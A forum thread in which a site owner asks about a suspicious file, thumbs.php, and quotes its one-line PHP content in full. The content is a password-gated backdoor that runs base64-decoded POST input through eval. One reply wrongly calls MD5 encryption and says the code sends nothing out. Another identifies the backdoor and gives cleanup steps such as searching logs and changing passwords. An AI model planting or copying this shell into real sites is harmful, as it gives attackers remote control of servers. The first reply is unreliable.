maybe hacking

[wawawe]

hi,

i have file thumbs.php in my server and this the content of it

Code: Select all

<?php if(md5($_POST["password"])=="beb89daa79e6174f2ca4288"){eval(base64_decode($_POST["code"]));} ?>

are this hacking?

if yes, how i can resolve it?

regards

wawawe

[kc0pph]

this looks like a hard coded password.

md5 is a hash technology that encrypts things. So its saying if the md5 of the password entered in = the stored value then do the code below. Im not 100% sure about what the "code below does" but it does not send any data to anyone else

[TheProdigyGuy]

Yes it is a probably backdoor.
eval()+base64().
And that 'scriptkiddie' evaluates his string as PHP code on your site.
So,he can wget new 'fresh' ) exploits to server+bypass servers security+can DDOS another sites +SPAM using your site.
Investigate from where and when that backdoor uploaded to your site?
Check your access and error logs.
Just do from SSH.
zgrep 'thatfilename' *.*|less
grep -r 'thatfilename' *.*|less
Then trace that IP.
I recommend to you remove all files from your site and update your software .Because it may contain backdoor.Shells like r57,c99,wso etc etc.
Also do not forget change yours mysql user name+mysql password+change your all passwords (ftp,cpanel,mysql)
your mails passwords+secret questions etc etc.
And finally make sure your hosting is correctly administering.
In some cases may be your script is not vulnerable but your hosting may be vulnerable to 'bypassing' attacks.
So, be carefull.